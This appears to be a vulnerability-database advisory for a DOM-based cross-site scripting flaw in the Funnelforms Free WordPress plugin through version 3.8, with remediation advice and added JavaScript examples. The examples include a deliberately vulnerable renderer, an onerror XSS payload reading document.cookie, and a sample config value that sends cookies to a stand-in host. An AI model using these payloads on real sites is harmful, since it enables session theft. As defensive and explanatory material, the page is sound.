CVE-2025-62758

2025-12-31

Lifecycle Timeline

Analysis Generated: Apr 01, 2026 - 17:44 (vuln.today)
CVE Published: Dec 31, 2025 - 09:15 (nvd)
Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Funnelforms Funnelforms Free funnelforms-free allows DOM-Based XSS. This issue affects Funnelforms Free: from n/a through <= 3.8.

Analysis

DOM-based cross-site scripting (XSS) in the Funnelforms Free WordPress plugin, versions 3.8 and earlier, lets an attacker inject script that runs in a victim's browser because the plugin's client-side code writes attacker-influenced input into the page without neutralizing it. The NVD description does not state the privilege level required to trigger the flaw. The vulnerability has a low EPSS score (0.04%, 14th percentile) and no confirmed active exploitation, so real-world attack probability is currently limited despite the XSS classification.

Technical Context

This vulnerability stems from inadequate input neutralization in the Funnelforms Free WordPress plugin, specifically in code that manipulates the DOM (Document Object Model). The root cause is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation), which applies when user-controlled input is written into a page without proper encoding or escaping for the context it lands in. WordPress plugins that handle form data are common XSS vectors because they process user input across several layers (client-side form handling, server-side processing, and database storage), and each layer is a place where encoding can be missed. The DOM-based variant means the vulnerability manifests in client-side JavaScript rather than in server-side HTML generation: the plugin's script reads a value from a client-side source (typically the URL fragment or query string, or a message from another window) and inserts it into the page through a sink such as innerHTML or document.write without sanitizing or encoding it. A practical consequence is that a payload carried in the URL fragment never reaches the server, so server-side request logs and a web application firewall may not see it at all.
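The following is an added example written for this page, not code from the Funnelforms plugin or from the advisory. It models a hypothetical step renderer (the `ff-step` fragment parameter and all function names are assumptions) and shows the vulnerable source-to-sink path beside a hardened version. Instead of touching a real DOM, each renderer returns the markup that would be assigned to `innerHTML`, so the behaviour can be checked in Node:

```javascript
// Added example for this page, not Funnelforms code. Models a hypothetical
// form-step renderer: the "source" is a location.hash-style string, the "sink"
// is the markup that would be assigned to el.innerHTML. The functions return
// that markup instead of writing to a DOM so the result can be checked in Node.

// Source: read `ff-step=<value>` from the URL fragment (assumed parameter name).
function stepFromHash(hash) {
  const m = /[#&]ff-step=([^&]*)/.exec(hash || "");
  return m ? decodeURIComponent(m[1]) : "1";
}

// Vulnerable pattern (CWE-79, DOM-based): attacker-influenced text is
// concatenated straight into markup that the browser will parse as HTML.
function renderStepVulnerable(hash) {
  const step = stepFromHash(hash);
  return `<div class="ff-step">Step ${step}</div>`;
}

// Output encoding for HTML text and quoted attribute contexts.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened pattern: validate the input against the shape the feature expects
// (a small step number), then encode before it reaches the sink.
function renderStepSafe(hash) {
  const raw = stepFromHash(hash);
  const step = /^\d{1,3}$/.test(raw) ? raw : "1";
  return `<div class="ff-step">Step ${escapeHtml(step)}</div>`;
}

// Coarse check used only by this demo: does the markup carry a live tag or
// inline event handler that a browser would act on when parsing it as HTML?
function containsActiveMarkup(html) {
  return /<\s*(script|img|svg|iframe)\b|<[^>]*\son\w+\s*=|javascript:/i.test(html);
}

// Constructed attack fragment: a classic image-tag payload with an onerror handler.
const ATTACK_HASH =
  "#ff-step=" + encodeURIComponent("<img src=x onerror=alert(document.cookie)>");

console.log(renderStepVulnerable(ATTACK_HASH)); // injected <img ...> survives intact
console.log(renderStepSafe(ATTACK_HASH));       // <div class="ff-step">Step 1</div>
```

The essential fix is the encoding at the sink (or using `textContent` rather than `innerHTML` when the value is plain text); the allowlist on the expected shape is defence in depth, and `escapeHtml` alone already neutralizes the payload in an HTML text context.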

Affected Products

Funnelforms Free WordPress plugin versions 3.8 and earlier are affected. The plugin is distributed through the WordPress plugin repository under the slug funnelforms-free (listed on this site as wp:funnelforms-free). Organizations running version 3.8 or any earlier release should prioritize assessment and patching.

Remediation

Update Funnelforms Free to version 3.9 or later, which addresses the DOM-based XSS vulnerability through improved input neutralization. Confirm the installed version on the WordPress Plugins screen or with `wp plugin get funnelforms-free --field=version`, and compare versions numerically rather than as strings so that a future 3.10 is not mistaken for a vulnerable release. For WordPress administrators unable to upgrade immediately, restrict access to form creation and editing functionality to trusted users, audit existing form configurations for suspicious JavaScript payloads, and consider a Content Security Policy that disallows inline script, which limits the impact of any DOM-based XSS while the upgrade is pending. For detailed guidance, consult the Patchstack vulnerability database entry at https://patchstack.com/database/Wordpress/Plugin/funnelforms-free/vulnerability/wordpress-funnelforms-free-plugin-3-8-cross-site-scripting-xss-vulnerability, which typically includes mitigation steps from the plugin vendor.
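Two checks that follow from this guidance, written as an added example for this page rather than code from Funnelforms or WordPress: a numeric version comparison against the fixed release, taken from a plugin's standard WordPress header comment, and an audit that walks an exported form configuration and lists values carrying markup or script. The header and configuration below are constructed samples and the configuration field names are assumptions, not the plugin's real schema:

```javascript
// Added example for this page, not Funnelforms or WordPress code. Two offline
// checks: (1) parse the plugin's standard header and compare its Version with
// the fixed release; (2) walk an exported form configuration and report values
// that carry markup or script. Header and configuration are constructed samples.

const FIXED_VERSION = "3.9"; // advisory: 3.8 and earlier are affected

// Pull `Version: x.y.z` out of a plugin main-file header comment.
function parsePluginVersion(headerText) {
  const m = /^\s*\*?\s*Version:\s*([0-9]+(?:\.[0-9]+)*)/m.exec(headerText);
  return m ? m[1] : null;
}

// Component-wise numeric comparison: a plain string compare would rank
// "3.10" below "3.9" and call a patched install vulnerable.
function compareVersions(a, b) {
  const pa = a.split(".").map(Number);
  const pb = b.split(".").map(Number);
  const n = Math.max(pa.length, pb.length);
  for (let i = 0; i < n; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

function isAffected(version) {
  return version !== null && compareVersions(version, FIXED_VERSION) < 0;
}

// Heuristic for stored payloads: script tags, inline event handlers,
// javascript: URLs and a few tags commonly used to smuggle handlers.
const SUSPICIOUS =
  /<\s*\/?\s*script\b|<[^>]*\son\w+\s*=|javascript\s*:|<\s*(iframe|svg|img|object|embed)\b/i;

// Recursively visit every string in a config object and return the dotted
// paths of the ones that match the heuristic.
function findSuspiciousValues(node, path = "") {
  if (typeof node === "string") {
    return SUSPICIOUS.test(node) ? [path] : [];
  }
  if (node && typeof node === "object") {
    return Object.entries(node).flatMap(([key, value]) =>
      findSuspiciousValues(value, path ? `${path}.${key}` : key));
  }
  return [];
}

// Constructed sample of a plugin main-file header (format is WordPress's standard).
const SAMPLE_HEADER = `<?php
/**
 * Plugin Name: Funnelforms Free
 * Version: 3.8
 */`;

// Constructed sample export; field names are assumptions, not the plugin's schema.
const SAMPLE_CONFIG = {
  title: "Contact funnel",
  steps: [
    { label: "Your name", placeholder: "Jane" },
    { label: '<img src=x onerror="fetch(\'//evil.example/?c=\'+document.cookie)">', placeholder: "" },
  ],
  redirect: "javascript:alert(document.domain)",
  thanks: "Thanks for your <b>time</b>",
};

const installed = parsePluginVersion(SAMPLE_HEADER);
console.log(`installed ${installed}, affected: ${isAffected(installed)}`); // installed 3.8, affected: true
console.log(findSuspiciousValues(SAMPLE_CONFIG)); // [ 'steps.1.label', 'redirect' ]
```

The audit is a triage aid, not proof of compromise: benign markup such as `<b>` is ignored, but any hit should be inspected by hand, and a clean result does not rule out payloads encoded in ways the regex does not recognise.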

Priority Score

0 (scale: Low / Medium / High / Critical)
KEV: 0
EPSS: +0.0
CVSS: +0
POC: 0
